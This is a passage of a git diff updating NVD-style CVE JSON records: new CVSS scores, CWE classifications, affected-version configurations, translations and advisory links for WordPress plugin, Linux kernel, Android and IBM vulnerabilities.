} \ No newline at end of file diff --git a/CVE-2021/CVE-2021-248xx/CVE-2021-24870.json b/CVE-2021/CVE-2021-248xx/CVE-2021-24870.json index 761c8ce5483..796a8b645f7 100644 --- a/CVE-2021/CVE-2021-248xx/CVE-2021-24870.json +++ b/CVE-2021/CVE-2021-248xx/CVE-2021-24870.json @@ -2,23 +2,87 @@ "id": "CVE-2021-24870", "sourceIdentifier": "contact@wpscan.com", "published": "2024-01-16T16:15:09.153", - "lastModified": "2024-01-16T23:12:38.473", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:25:10.717", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "The WP Fastest Cache WordPress plugin before 0.9.5 is lacking a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload" + }, + { + "lang": "es", + "value": "El complemento de WordPress WP Fastest Cache anterior a 0.9.5 carece de una verificaci\u00f3n CSRF en su acci\u00f3n AJAX wpfc_save_cdn_integration, y no sanitiza ni escapa algunas de las opciones disponibles a trav\u00e9s de la acci\u00f3n, lo que podr\u00eda permitir a los atacantes hacer que los usuarios registrados con altos privilegios lo llamen y configuren un payload de cross site scripting" + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "REQUIRED", + "scope": "CHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 6.1, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.8, + "impactScore": 2.7 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-352" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*", + "versionEndExcluding": "0.9.5", + "matchCriteriaId": "C5057D35-B8BB-4AC3-ADCD-F89EA6099A95" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://jetpack.com/2021/10/14/multiple-vulnerabilities-in-wp-fastest-cache-plugin/", - "source": "contact@wpscan.com" + "source": "contact@wpscan.com", + "tags": [ + "Exploit", + "Third Party Advisory" + ] }, { "url": "https://wpscan.com/vulnerability/48de63ab-2ef1-4469-8fc4-9346068bdf06/", - "source": "contact@wpscan.com" + "source": "contact@wpscan.com", + "tags": [ + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2021/CVE-2021-251xx/CVE-2021-25117.json b/CVE-2021/CVE-2021-251xx/CVE-2021-25117.json index f1575fcedff..02f2983ae48 100644 --- a/CVE-2021/CVE-2021-251xx/CVE-2021-25117.json +++ b/CVE-2021/CVE-2021-251xx/CVE-2021-25117.json @@ -2,19 +2,80 @@ "id": "CVE-2021-25117", "sourceIdentifier": "contact@wpscan.com", "published": "2024-01-16T16:15:09.213", - "lastModified": "2024-01-16T23:12:38.473", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:24:25.360", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "The WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled." + }, + { + "lang": "es", + "value": "El complemento de WordPress WP-PostRatings anterior a 1.86.1 no sanitiza el par\u00e1metro postratings_image de su p\u00e1gina de opciones (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Aunque solo los administradores pueden acceder a la p\u00e1gina y est\u00e1 protegida contra ataques CSRF, el problema a\u00fan se puede explotar cuando la capacidad unfiltered_html est\u00e1 deshabilitada." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "HIGH", + "userInteraction": "REQUIRED", + "scope": "CHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 4.8, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 1.7, + "impactScore": 2.7 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-352" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:lesterchan:wp-postratings:*:*:*:*:*:wordpress:*:*", + "versionEndExcluding": "1.86.1", + "matchCriteriaId": "28B896C6-D8D0-4B5D-8B36-244EBDF8FEA9" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://wpscan.com/vulnerability/d2d9a789-edae-4ae1-92af-e6132db7efcd/", - "source": "contact@wpscan.com" + "source": "contact@wpscan.com", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2021/CVE-2021-42xx/CVE-2021-4227.json b/CVE-2021/CVE-2021-42xx/CVE-2021-4227.json index aa0dac257ff..2dd22706289 100644 --- a/CVE-2021/CVE-2021-42xx/CVE-2021-4227.json +++ b/CVE-2021/CVE-2021-42xx/CVE-2021-4227.json @@ -2,19 +2,80 @@ "id": "CVE-2021-4227", "sourceIdentifier": "contact@wpscan.com", "published": "2024-01-16T16:15:09.270", - "lastModified": "2024-01-16T23:12:38.473", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:29:25.803", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section" + }, + { + "lang": "es", + "value": "El complemento de WordPress ark-commenteditor hasta la versi\u00f3n 2.15.6 no sanitiza ni codifica adecuadamente los comentarios cuando est\u00e1 en el editor de c\u00f3digo fuente, lo que permite a los atacantes inyectar un iFrame en la p\u00e1gina y, por lo tanto, cargar contenido arbitrario desde cualquier p\u00e1gina a la secci\u00f3n de comentarios." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 5.3, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 3.9, + "impactScore": 1.4 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-74" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:obg:ark_wysiwyg_comment_editor:*:*:*:*:*:wordpress:*:*", + "versionEndIncluding": "2.15.6", + "matchCriteriaId": "0D7DDA5E-7004-48F6-A6E7-4D283878B1DE" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://wpscan.com/vulnerability/8d015eba-31dc-44cb-a051-4e95df782b75/", - "source": "contact@wpscan.com" + "source": "contact@wpscan.com", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2022/CVE-2022-236xx/CVE-2022-23633.json b/CVE-2022/CVE-2022-236xx/CVE-2022-23633.json index c7e374950e8..d2f59bda14c 100644 --- a/CVE-2022/CVE-2022-236xx/CVE-2022-23633.json +++ b/CVE-2022/CVE-2022-236xx/CVE-2022-23633.json @@ -2,8 +2,8 @@ "id": "CVE-2022-23633", "sourceIdentifier": "security-advisories@github.com", "published": "2022-02-11T21:15:11.990", - "lastModified": "2023-07-11T20:41:55.303", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:08.417", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -200,6 +200,10 @@ "Third Party Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0013/", + "source": "security-advisories@github.com" + }, { "url": "https://www.debian.org/security/2023/dsa-5372", "source": "security-advisories@github.com", diff --git a/CVE-2022/CVE-2022-407xx/CVE-2022-40700.json b/CVE-2022/CVE-2022-407xx/CVE-2022-40700.json new file mode 100644 index 00000000000..76907cf2294 --- /dev/null +++ b/CVE-2022/CVE-2022-407xx/CVE-2022-40700.json @@ -0,0 +1,111 @@ +{ + "id": "CVE-2022-40700", + "sourceIdentifier": "audit@patchstack.com", + "published": "2024-01-19T15:15:08.020", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP \u2013 Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet \u2013 A virtual wallet for WooCommerce, Long Watch Studio WooVIP \u2013 Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply \u2013 Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder \u2013 Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet \u2013 A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP \u2013 Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply \u2013 Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder \u2013 Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6.\n\n" + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "audit@patchstack.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 8.2, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 3.9, + "impactScore": 4.2 + } + ] + }, + "weaknesses": [ + { + "source": "audit@patchstack.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-918" + } + ] + } + ], + "references": [ + { + "url": "https://patchstack.com/database/vulnerability/admin-css-mu/wordpress-admin-css-mu-plugin-2-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/amp-toolbox/wordpress-amp-toolbox-plugin-2-1-1-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/confirm-data/wordpress-confirm-data-plugin-1-0-7-unauth-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/css-adder-by-agence-press/wordpress-css-adder-by-agene-press-plugin-1-5-0-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/custom-login-admin-front-end-css-with-multisite-support/wordpress-custom-login-admin-front-end-css-plugin-1-4-1-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/montonio-for-woocommerce/wordpress-montonio-for-woocommerce-plugin-6-0-1-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/phpfreechat/wordpress-phpfreechat-plugin-0-2-8-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/qards-free/wordpress-wordpress-page-builder-qards-plugin-1-0-5-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/styles/wordpress-styles-plugin-1-2-3-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/theme-minifier/wordpress-theme-minifier-plugin-2-0-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/woosupply/wordpress-woosupply-plugin-1-2-2-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/woovip/wordpress-woovip-plugin-1-4-4-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/woovirtualwallet/wordpress-woovirtualwallet-plugin-2-2-1-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/wp-amo/wordpress-amo-for-wp-plugin-4-6-6-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + }, + { + "url": "https://patchstack.com/database/vulnerability/wpopal-core-features/wordpress-wpopal-core-features-plugin-1-5-7-server-side-request-forgery-ssrf?_s_id=cve", + "source": "audit@patchstack.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2022/CVE-2022-428xx/CVE-2022-42889.json b/CVE-2022/CVE-2022-428xx/CVE-2022-42889.json index c56fb3dc530..029e5266e9c 100644 --- a/CVE-2022/CVE-2022-428xx/CVE-2022-42889.json +++ b/CVE-2022/CVE-2022-428xx/CVE-2022-42889.json @@ -2,8 +2,8 @@ "id": "CVE-2022-42889", "sourceIdentifier": "security@apache.org", "published": "2022-10-13T13:15:10.113", - "lastModified": "2023-04-17T16:47:17.233", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:08.583", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -52,7 +52,6 @@ ], "configurations": [ { - "operator": "AND", "nodes": [ { "operator": "OR", @@ -70,7 +69,6 @@ ] }, { - "operator": "AND", "nodes": [ { "operator": "OR", @@ -173,6 +171,10 @@ "VDB Entry" ] }, + { + "url": "http://packetstormsecurity.com/files/176650/Apache-Commons-Text-1.9-Remote-Code-Execution.html", + "source": "security@apache.org" + }, { "url": "http://seclists.org/fulldisclosure/2023/Feb/3", "source": "security@apache.org", diff --git a/CVE-2022/CVE-2022-450xx/CVE-2022-45083.json b/CVE-2022/CVE-2022-450xx/CVE-2022-45083.json new file mode 100644 index 00000000000..148d330e880 --- /dev/null +++ b/CVE-2022/CVE-2022-450xx/CVE-2022-45083.json @@ -0,0 +1,55 @@ +{ + "id": "CVE-2022-45083", + "sourceIdentifier": "audit@patchstack.com", + "published": "2024-01-19T15:15:08.247", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress.This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress: from n/a through 4.3.2.\n\n" + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "audit@patchstack.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "HIGH", + "userInteraction": "NONE", + "scope": "CHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "LOW", + "availabilityImpact": "LOW", + "baseScore": 6.6, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.3, + "impactScore": 3.7 + } + ] + }, + "weaknesses": [ + { + "source": "audit@patchstack.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-502" + } + ] + } + ], + "references": [ + { + "url": "https://patchstack.com/database/vulnerability/wp-user-avatar/wordpress-profilepress-plugin-4-3-2-auth-php-object-injection-vulnerability?_s_id=cve", + "source": "audit@patchstack.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2022/CVE-2022-458xx/CVE-2022-45845.json b/CVE-2022/CVE-2022-458xx/CVE-2022-45845.json new file mode 100644 index 00000000000..a290e0cd62c --- /dev/null +++ b/CVE-2022/CVE-2022-458xx/CVE-2022-45845.json @@ -0,0 +1,55 @@ +{ + "id": "CVE-2022-45845", + "sourceIdentifier": "audit@patchstack.com", + "published": "2024-01-19T15:15:08.467", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9.\n\n" + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "audit@patchstack.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 4.3, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.8, + "impactScore": 1.4 + } + ] + }, + "weaknesses": [ + { + "source": "audit@patchstack.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-502" + } + ] + } + ], + "references": [ + { + "url": "https://patchstack.com/database/vulnerability/smart-slider-3/wordpress-smart-slider-3-plugin-3-5-1-9-auth-php-object-injection-vulnerability?_s_id=cve", + "source": "audit@patchstack.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2022/CVE-2022-471xx/CVE-2022-47160.json b/CVE-2022/CVE-2022-471xx/CVE-2022-47160.json new file mode 100644 index 00000000000..b9872fc8a34 --- /dev/null +++ b/CVE-2022/CVE-2022-471xx/CVE-2022-47160.json @@ -0,0 +1,55 @@ +{ + "id": "CVE-2022-47160", + "sourceIdentifier": "audit@patchstack.com", + "published": "2024-01-19T15:15:08.777", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0.\n\n" + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "audit@patchstack.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 6.5, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.8, + "impactScore": 3.6 + } + ] + }, + "weaknesses": [ + { + "source": "audit@patchstack.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-200" + } + ] + } + ], + "references": [ + { + "url": "https://patchstack.com/database/vulnerability/wp-social/wordpress-wp-social-plugin-1-9-0-auth-sensitive-information-disclosure-vulnerability?_s_id=cve", + "source": "audit@patchstack.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2022/CVE-2022-486xx/CVE-2022-48619.json b/CVE-2022/CVE-2022-486xx/CVE-2022-48619.json index 6e6216be524..2d17aac4c47 100644 --- a/CVE-2022/CVE-2022-486xx/CVE-2022-48619.json +++ b/CVE-2022/CVE-2022-486xx/CVE-2022-48619.json @@ -2,8 +2,8 @@ "id": "CVE-2022-48619", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-12T03:15:08.633", - "lastModified": "2024-01-12T13:47:31.250", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:27:59.073", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,15 +14,75 @@ "value": "Se descubri\u00f3 un problema en drivers/input/input.c en el kernel de Linux anterior a la versi\u00f3n 5.17.10. Un atacante puede provocar una denegaci\u00f3n de servicio (p\u00e1nico) porque input_set_capability maneja mal la situaci\u00f3n en la que un c\u00f3digo de evento queda fuera de un mapa de bits." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "attackVector": "LOCAL", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "NONE", + "availabilityImpact": "HIGH", + "baseScore": 5.5, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 1.8, + "impactScore": 3.6 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "NVD-CWE-noinfo" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", + "versionEndExcluding": "5.17.10", + "matchCriteriaId": "9FD70CAF-9EE4-481A-B8B7-4245DD096325" + } + ] + } + ] + } + ], "references": [ { "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.17.10", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Mailing List", + "Patch" + ] }, { "url": "https://github.com/torvalds/linux/commit/409353cbe9fe48f6bc196114c442b1cff05a39bc", - "source": "cve@mitre.org" + "source": "cve@mitre.org", + "tags": [ + "Patch" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-20xx/CVE-2023-2007.json b/CVE-2023/CVE-2023-20xx/CVE-2023-2007.json index 3bea702cc1a..fe915351d30 100644 --- a/CVE-2023/CVE-2023-20xx/CVE-2023-2007.json +++ b/CVE-2023/CVE-2023-20xx/CVE-2023-2007.json @@ -2,7 +2,7 @@ "id": "CVE-2023-2007", "sourceIdentifier": "secalert@redhat.com", "published": "2023-04-24T23:15:18.877", - "lastModified": "2023-10-20T00:15:12.483", + "lastModified": "2024-01-19T16:15:08.907", "vulnStatus": "Undergoing Analysis", "descriptions": [ { @@ -90,6 +90,10 @@ "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html", "source": "secalert@redhat.com" }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0011/", + "source": "secalert@redhat.com" + }, { "url": "https://www.debian.org/security/2023/dsa-5480", "source": "secalert@redhat.com" diff --git a/CVE-2023/CVE-2023-212xx/CVE-2023-21255.json b/CVE-2023/CVE-2023-212xx/CVE-2023-21255.json index 1fdd8e0df5d..f3895a2cb71 100644 --- a/CVE-2023/CVE-2023-212xx/CVE-2023-21255.json +++ b/CVE-2023/CVE-2023-212xx/CVE-2023-21255.json @@ -2,8 +2,8 @@ "id": "CVE-2023-21255", "sourceIdentifier": "security@android.com", "published": "2023-07-13T00:15:24.053", - "lastModified": "2023-11-02T01:13:59.657", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:08.713", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -103,6 +103,10 @@ "Third Party Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0010/", + "source": "security@android.com" + }, { "url": "https://source.android.com/security/bulletin/2023-07-01", "source": "security@android.com", diff --git a/CVE-2023/CVE-2023-214xx/CVE-2023-21400.json b/CVE-2023/CVE-2023-214xx/CVE-2023-21400.json index 86847c2c92e..e2e748221d1 100644 --- a/CVE-2023/CVE-2023-214xx/CVE-2023-21400.json +++ b/CVE-2023/CVE-2023-214xx/CVE-2023-21400.json @@ -2,8 +2,8 @@ "id": "CVE-2023-21400", "sourceIdentifier": "security@android.com", "published": "2023-07-13T00:15:24.340", - "lastModified": "2023-10-26T18:20:32.370", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:08.817", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -132,6 +132,10 @@ "Third Party Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0012/", + "source": "security@android.com" + }, { "url": "https://source.android.com/security/bulletin/pixel/2023-07-01", "source": "security@android.com", diff --git a/CVE-2023/CVE-2023-271xx/CVE-2023-27168.json b/CVE-2023/CVE-2023-271xx/CVE-2023-27168.json index 1f319580207..eded317a130 100644 --- a/CVE-2023/CVE-2023-271xx/CVE-2023-27168.json +++ b/CVE-2023/CVE-2023-271xx/CVE-2023-27168.json @@ -2,8 +2,8 @@ "id": "CVE-2023-27168", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:12.247", - "lastModified": "2024-01-19T14:15:12.247", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2023/CVE-2023-323xx/CVE-2023-32337.json b/CVE-2023/CVE-2023-323xx/CVE-2023-32337.json index ad45d9699c9..9da3f94c66f 100644 --- a/CVE-2023/CVE-2023-323xx/CVE-2023-32337.json +++ b/CVE-2023/CVE-2023-323xx/CVE-2023-32337.json @@ -2,12 +2,16 @@ "id": "CVE-2023-32337", "sourceIdentifier": "psirt@us.ibm.com", "published": "2024-01-19T02:15:07.537", - "lastModified": "2024-01-19T02:15:07.537", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", "value": "IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288." + }, + { + "lang": "es", + "value": "IBM Maximo Spatial Asset Management 8.10 es vulnerable a server-side request forgery (SSRF). Esto puede permitir que un atacante autenticado env\u00ede solicitudes no autorizadas desde el sistema, lo que podr\u00eda provocar la enumeraci\u00f3n de la red o facilitar otros ataques. ID de IBM X-Force: 255288." } ], "metrics": { diff --git a/CVE-2023/CVE-2023-380xx/CVE-2023-38003.json b/CVE-2023/CVE-2023-380xx/CVE-2023-38003.json index a43aab0dfbe..f51f69996dc 100644 --- a/CVE-2023/CVE-2023-380xx/CVE-2023-38003.json +++ b/CVE-2023/CVE-2023-380xx/CVE-2023-38003.json @@ -2,8 +2,8 @@ "id": "CVE-2023-38003", "sourceIdentifier": "psirt@us.ibm.com", "published": "2023-12-04T01:15:08.217", - "lastModified": "2023-12-07T15:34:59.537", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:09.013", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -136,6 +136,10 @@ "Vendor Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0001/", + "source": "psirt@us.ibm.com" + }, { "url": "https://www.ibm.com/support/pages/node/7078681", "source": "psirt@us.ibm.com", diff --git a/CVE-2023/CVE-2023-387xx/CVE-2023-38727.json b/CVE-2023/CVE-2023-387xx/CVE-2023-38727.json index 9fbf0e5a55e..f746abac10c 100644 --- a/CVE-2023/CVE-2023-387xx/CVE-2023-38727.json +++ b/CVE-2023/CVE-2023-387xx/CVE-2023-38727.json @@ -2,8 +2,8 @@ "id": "CVE-2023-38727", "sourceIdentifier": "psirt@us.ibm.com", "published": "2023-12-04T02:15:06.867", - "lastModified": "2023-12-07T17:34:50.503", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:09.123", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -144,6 +144,10 @@ "Vendor Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0001/", + "source": "psirt@us.ibm.com" + }, { "url": "https://www.ibm.com/support/pages/node/7087143", "source": "psirt@us.ibm.com", diff --git a/CVE-2023/CVE-2023-406xx/CVE-2023-40687.json b/CVE-2023/CVE-2023-406xx/CVE-2023-40687.json index db3d8a13733..2767d5e3766 